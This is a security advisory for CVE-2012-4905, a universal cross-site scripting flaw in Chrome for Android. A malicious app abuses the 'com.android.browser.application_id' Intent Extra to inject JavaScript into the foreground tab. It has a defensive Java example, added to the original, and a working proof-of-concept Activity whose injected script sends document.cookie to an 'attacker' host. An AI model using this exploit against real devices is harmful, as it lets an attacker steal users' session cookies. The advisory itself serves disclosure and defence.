Chrome For Android Universal Cross Site Scripting

Author: Takeshi Terada
Source: packetstormsecurity.com (PACKETSTORM:119295)
Published: 2013-01-07

EPSS: 0.001 (Low), percentile 49.6%

CVE Number: CVE-2012-4905
Title: Chrome for Android - UXSS via com.android.browser.application_id Intent extra
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 has been released and fixes this vulnerability
  
Overview:
By sending a crafted Intent to Chrome for Android, a malicious Android app can
inject JavaScript into arbitrary Web pages rendered in Chrome. This kind of
UXSS-like vulnerability, where the attacker is another app on the same device
rather than a Web page, is often called Cross-Application Scripting.
  
Details:
When another Android app sends an Intent whose data is a javascript: URI to
Chrome for Android (v18.0.1025123), Chrome opens a new tab and executes the
JavaScript code in the context of a blank page, so the script has no access to
any site's cookies or content. This is probably a countermeasure against UXSS
attacks.

However, this can be bypassed by adding the following Extra to the Intent:

intent.putExtra("com.android.browser.application_id", "com.android.chrome");

With an Intent that carries this Extra, Chrome loads the javascript: URI
(taken from the Intent data) in the current foreground tab instead of a blank
tab, i.e. in the origin of whatever page is currently displayed there.

This enables a malicious Android app to execute arbitrary JavaScript code in
arbitrary origins in Chrome. As a result, another app is able to steal the
user's cookies for any site, read or modify page contents, and so on.
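For the browser side, the following is an added example of how an Activity that receives external VIEW Intents can close this hole. It is not Chrome's code and not part of the original advisory; the package name, the class name, the Disposition enum and the two tab-loading helpers are hypothetical, while the Android APIs used (Intent, Uri, Activity.getCallingPackage, onNewIntent) are real. The two rules it enforces: a javascript: URI arriving from another process is never executed, whatever Extras or flags accompany it, and the application_id Extra is never trusted on its own to route a URL into an existing tab, because any app can set it.

```java
// Added example (not Chrome's code): hardened handling of incoming VIEW
// Intents in a browser Activity. Package and class names are hypothetical.
package example.browser;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import java.util.Locale;

public class BrowserActivity extends Activity {
    // The Extra the advisory's PoC abuses to target the foreground tab.
    static final String EXTRA_APPLICATION_ID = "com.android.browser.application_id";

    // What the browser should do with an externally supplied Intent.
    enum Disposition { LOAD_IN_CURRENT_TAB, LOAD_IN_NEW_TAB, DROP }

    // Pure decision function so it can be unit-tested without an Activity.
    // callingPackage is Activity.getCallingPackage(); it is null unless the
    // sender used startActivityForResult(), so null means "unknown caller".
    static Disposition classify(Uri data, String applicationId,
                                String callingPackage, String ownPackage) {
        if (data == null || data.getScheme() == null) {
            return Disposition.DROP;
        }
        // Normalise the scheme so "JavaScript:" or " javascript:" cannot slip
        // past a case-sensitive comparison.
        String scheme = data.getScheme().trim().toLowerCase(Locale.ROOT);

        // Script supplied by another process is never executed, no matter
        // which Extras (application_id included) or flags accompany it.
        if (scheme.equals("javascript")) {
            return Disposition.DROP;
        }
        if (!scheme.equals("http") && !scheme.equals("https")) {
            return Disposition.DROP; // other schemes get no special handling here
        }

        // Any app can set application_id, so it proves nothing about the
        // sender. Reuse the current tab only when the Intent verifiably came
        // from our own package; everything else lands in a fresh tab.
        boolean claimsToBeUs = ownPackage.equals(applicationId);
        boolean verifiedUs = ownPackage.equals(callingPackage);
        if (claimsToBeUs && verifiedUs) {
            return Disposition.LOAD_IN_CURRENT_TAB;
        }
        return Disposition.LOAD_IN_NEW_TAB;
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        handleExternalIntent(getIntent());
    }

    // Reached for FLAG_ACTIVITY_SINGLE_TOP deliveries, the path the PoC uses
    // to hit an already running browser instance.
    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        setIntent(intent);
        handleExternalIntent(intent);
    }

    private void handleExternalIntent(Intent intent) {
        if (intent == null || !Intent.ACTION_VIEW.equals(intent.getAction())) {
            return;
        }
        Disposition d = classify(intent.getData(),
                                 intent.getStringExtra(EXTRA_APPLICATION_ID),
                                 getCallingPackage(), getPackageName());
        switch (d) {
            case LOAD_IN_CURRENT_TAB: loadInCurrentTab(intent.getData()); break;
            case LOAD_IN_NEW_TAB:     loadInNewTab(intent.getData());     break;
            case DROP:                /* ignore silently */                break;
        }
    }

    // Tab plumbing is browser-specific; these hypothetical helpers stand in for it.
    private void loadInCurrentTab(Uri uri) { /* navigate the foreground tab to uri */ }
    private void loadInNewTab(Uri uri) { /* open uri in a fresh, isolated tab */ }
}
```

Run against the advisory's PoC, intent2 is dropped at the scheme check before the application_id Extra is even consulted, and intent1 opens in a new tab because a plain startActivity() call leaves getCallingPackage() null. Note that getCallingPackage() is the only sender identity Android gives an Activity, and only for startActivityForResult(); a browser that needs to route its own internal navigations into the current tab should use an in-process mechanism rather than an Extra any caller can forge.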
  
Proof of Concept:
package jp.mbsd.terada.attackchrome1;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class Main extends Activity {
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        doit();
    }

    // Build an explicit VIEW Intent that targets the Chrome app
    public Intent getIntentForChrome(String url) {
        Intent intent = new Intent("android.intent.action.VIEW");
        intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
        intent.setData(Uri.parse(url));
        return intent;
    }

    public void doit() {
        try {
            // At first, force the Chrome app to open the target Web page
            Intent intent1 = getIntentForChrome("http://www.google.com/1");
            startActivity(intent1);

            // Wait a few seconds for the page to load in the foreground tab
            Thread.sleep(3000);

            // JS code to inject into the target (www.google.com):
            // it sends the cookies and domain to the attacker's server
            String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
                + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                + "document.body.appendChild(img);";

            Intent intent2 = getIntentForChrome(jsURL);

            // Trick to prevent Chrome from opening the JS URL in a different tab
            intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
            intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);

            // Inject JS into the target Web page
            startActivity(intent2);
        } catch (Exception e) {
        }
    }
}
  
Timeline:
2012/07/07 Reported to Google security team.
2012/09/12 Vendor announced v18.0.1025308.
2013/01/07 Disclosure of this advisory.
  
Recommendation:
Upgrade to Chrome for Android v18.0.1025308 or later.
  
Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144813
